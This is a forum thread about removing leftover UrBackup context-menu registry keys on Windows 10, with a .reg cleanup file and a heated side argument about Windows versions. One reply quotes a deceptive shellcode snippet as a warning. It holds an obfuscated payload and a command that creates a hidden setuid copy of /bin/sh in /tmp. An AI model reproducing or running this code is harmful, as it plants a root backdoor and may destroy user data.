Remove Windows registry entry for Context Menu after uninstall

============================================
UrBackup doesnt remove windows registry entries for Explorer’s Context Menu

On Windows 10, using the client installation from a Docker server install:
When UrBackup was uninstalled, I still saw the context menu that was there after installation.
Right click on a file and “Access backups” was still there, broken.

The following were the registry entries I had to remove, after having already uninstalled Urbackup to remove the Context Menu “Access backups.”

================================================================

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shell\urbackup.access.0]
“MUIVerb”=“&Access backups”
“Icon”=“C:\Program Files\UrBackup\backup-ok.ico”
“AppliesTo”=“System.ParsingPath:~<"D:\"”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shell\urbackup.access.0\Command]
@=“"C:\Program Files\UrBackup\UrBackupClient.exe" access "%1"”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shell\urbackup.access.1]
“MUIVerb”=“&Access backups”
“Icon”=“C:\Program Files\UrBackup\backup-ok.ico”
“AppliesTo”=“System.ParsingPath:~<"C:\"”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shell\urbackup.access.1\Command]
@=“"C:\Program Files\UrBackup\UrBackupClient.exe" access "%1"”

============================================
FILE: Remove-UrBackup-Context-Menu.reg

Windows Registry Editor Version 5.00

; Ur Backup doesnt remove windows registry entries for Explorer's Context Menu
; This will remove that entry.

[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shell\urbackup]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shell\urbackup.access]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shell\urbackup.access.0]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shell\urbackup.access.1]

================================================================
Thanks,
windowsbackupuser

Just a quick note about this.
How is the registry keys handled on win11?

Just a personal recommendation, try to get away from win10.
Maybe it’s time to look into a linux distro you can run with dual boot so you still have access to win10 for “comfort”.

Not a huge fan of microsoft, but win11 is at least better than win10, if you can install it that is.
That is why I’m nowdays recommending ppl to seriously look into a linux distro instead and try it out with dual boot BEFORE end of support of win10 in about 2 yeas. So you have time to both learn and evaluate what distro fits you, or if even linux is for you, maybe you just totally hate everything about it.

Windows10 ONLY gets security patches now, that’s it, no other updates.

Things like you describe above f.ex (not 100% sure) I would not be surprised if it doesn’t happen on win11, because a LOT of things changed between the versions.

Just my 2 cents.

For the OP, since it’s been raised as a potential concern from a non-W11 (that the OP isn’t using) user:

The above reg file will indeed remove the stated keys in a W11 installation.

From a user with W11, W10 and linux (Ubuntu 20.04) installs.

Not certain of the relevance of the comments to the OP helping others with W10 installs.

The relevance is that it is not safe in a security point of view.

The relevance is that the registry is NOT the same on win10 and win11.
I do not know if these exact things in the registry has changed, but using common sense and knowledge that the registry is NOT THE SAME on the 2 versions, it leads to assume that urbackup is supporting win11 and not win10, hence the behavior of op:s installation.

Edit
Furthermore, if YOU have a win10 installation, why not do what op did and help him out to solve it, you have the ability, I do not.
My message was out of concern for op security…
What is the point of YOUR message? (don’t answer that, it was a rhetorical question and does not help op one bit)

Neither did yours – which is a sad state, because they normally don’t.

urbackup works well on W11 and W10 installs.

for someone who is hypercritical on RTFM kinda stuff, the OP NEVER had a problem that he/she did not already have a solution for - uninstall left registry entries - here’s where they are, here’s a reg file to remove them so you don’t have to do so one by one. What problem EXACTLY is it your suggestion to me to solve on my W10 install? Certainly a concern from someone who has neither W10 or W11 installs??

Again, I am confused on exactly WHAT your relevance is?

Glad you asked:
Do the same procedure as OP but on win11 and see if all entries that has been made by urbackup into the registry will be deleted at uninstall or not.
That way we know if this is limited to win10 only or if these extra steps are required on win11 aswell.

Better not throw stones in glasshouses buddy.
Please stop posting thing trying to start drama, whatever you do in your own post is up to you, but for the sake of OP, please not here as well.

To conclude your drama (since you have no f-ng clue about Windows): Although I did state that urbackup works on W11 and W10, I also stated early on, although you seem to have a problem READING:

So once again, I am left clueless as to what problem you really wanted me to solve from the OP. But that is your modus operandi.

Editing the registry is no more dangerous for someone who can actually FIND those keys, AND write a reg file that will REMOVE those keys than an experienced linux shell dood looking at the following and saying …hmmm…no way am I going to execute that script:

char esp __attribute __ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

To quote the source:

“This command here shows that the threat may be hidden and not normally detectable sometimes. You must be aware of what you are doing and what would be the result. Don’t compile/run codes from an unknown source.”

May not be obvious to you, but OP definitely knows about registry editing. If you understand, it’s really not a world ending crisis (the reg file detailed).

PS: I would definitely suggest you NOT run the above script from the command line in a *ix console. But I’m sure you were already aware of that, no??